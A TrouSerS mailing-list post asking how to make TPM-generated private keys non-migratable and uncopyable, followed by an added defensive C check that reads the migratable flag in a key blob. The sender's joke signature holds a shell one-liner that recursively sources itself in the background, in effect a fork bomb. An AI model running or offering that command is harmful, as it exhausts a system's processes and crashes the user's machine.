On 15 November 2013 14:21, Dmitri Toubelis <[email protected]> wrote:
> I think your concerns are ungrounded. The way the TPM works is that the private key
> never leaves the hardware unencrypted. This applies to migratable keys too. When
> you create a migration blob it will be encrypted inside the TPM chip with the
> public key you provide.

Right, so if I in the migration supply a public key that I have the
private key for, I have the TPM chip extract the key for me in a form
I can decrypt, correct?

The reason I want to use the TPM chip is so that a private key cannot
be copied. Not so that it cannot be copied unless I have a certain
password or key.
I don't care if the keys are actually stored in the TPM or not. But
they should not be copyable (in a usable form), and should never be
seen by CPU or RAM in a form where they could be usefully inspected.

It sounds to me like what I want to do is patch pkcs11-tool to always
use TSS_KEY_NOT_MIGRATABLE in its calls to CreateKey, and regenerate
my keys. Does that sound like it would satisfy my requirements?

I tried making my own key generator using Tspi_ calls, but following
example code on the Internet just made Tspi_Key_CreateKey() return 1,
which is not a documented return value as seen in the manpage.

-- 
typedef struct me_s {
 char name[]      = { "Thomas Habets" };
 char email[]     = { "[email protected]" };
 char kernel[]    = { "Linux" };
 char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt"; };
 char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
 char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
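A defender-side check related to the non-migratable requirement discussed above, added here as an example and not code from this thread or from TrouSerS: it reads the keyFlags field of a serialized TPM 1.2 key blob (the TPM_KEY/TPM_KEY12 layout from the TPM Main Specification Part 2, which is the bit that TSS_KEY_NOT_MIGRATABLE leaves clear at creation) and reports whether the key is marked migratable, so existing blobs can be audited before deciding which keys need regenerating. The sample headers are constructed, not taken from a real TPM.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* TPM 1.2 serialized key header (TPM Main Part 2: TPM_KEY and TPM_KEY12).
 * Both layouts put keyUsage at offset 4 and the big-endian 32-bit keyFlags
 * at offset 6, so one check covers either structure version. */
#define TPM_TAG_KEY12           0x0028u
#define TPM_KEY_FLAG_MIGRATABLE 0x00000002u
#define TPM_KEY_HDR_LEN         11u  /* up to and including authDataUsage */

enum key_migratability { KEY_BLOB_INVALID = -1, KEY_NOT_MIGRATABLE = 0, KEY_MIGRATABLE = 1 };

static uint16_t be16(const uint8_t *p) { return (uint16_t)(((uint16_t)p[0] << 8) | p[1]); }
static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Classify a serialized key blob by its keyFlags.migratable bit. */
int tpm_key_blob_migratable(const uint8_t *blob, size_t len)
{
    if (blob == NULL || len < TPM_KEY_HDR_LEN)
        return KEY_BLOB_INVALID;
    /* TPM_KEY12 starts with tag 0x0028 and a zero fill word; the older
     * TPM_KEY layout starts with TPM_STRUCT_VER {1, 1, 0, 0}. */
    int is_key12 = be16(blob) == TPM_TAG_KEY12 && be16(blob + 2) == 0;
    int is_key11 = blob[0] == 1 && blob[1] == 1 && blob[2] == 0 && blob[3] == 0;
    if (!is_key12 && !is_key11)
        return KEY_BLOB_INVALID;
    return (be32(blob + 6) & TPM_KEY_FLAG_MIGRATABLE) ? KEY_MIGRATABLE : KEY_NOT_MIGRATABLE;
}

/* Constructed sample headers (not real TPM output): tag, fill, keyUsage =
 * TPM_KEY_SIGNING (0x0010), keyFlags, authDataUsage = TPM_AUTH_ALWAYS (1).
 * A real blob continues with TPM_KEY_PARMS, PCRInfo, the public key and the
 * parent-encrypted private part, none of which this check needs. */
static const uint8_t sample_migratable[] = {
    0x00, 0x28, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x01 };
static const uint8_t sample_nonmigratable[] = {
    0x00, 0x28, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x01 };

int main(void)
{
    printf("migratable sample:     %d\n",
           tpm_key_blob_migratable(sample_migratable, sizeof sample_migratable));
    printf("non-migratable sample: %d\n",
           tpm_key_blob_migratable(sample_nonmigratable, sizeof sample_nonmigratable));
    return 0;
}
```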

_______________________________________________
TrouSerS-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/trousers-users
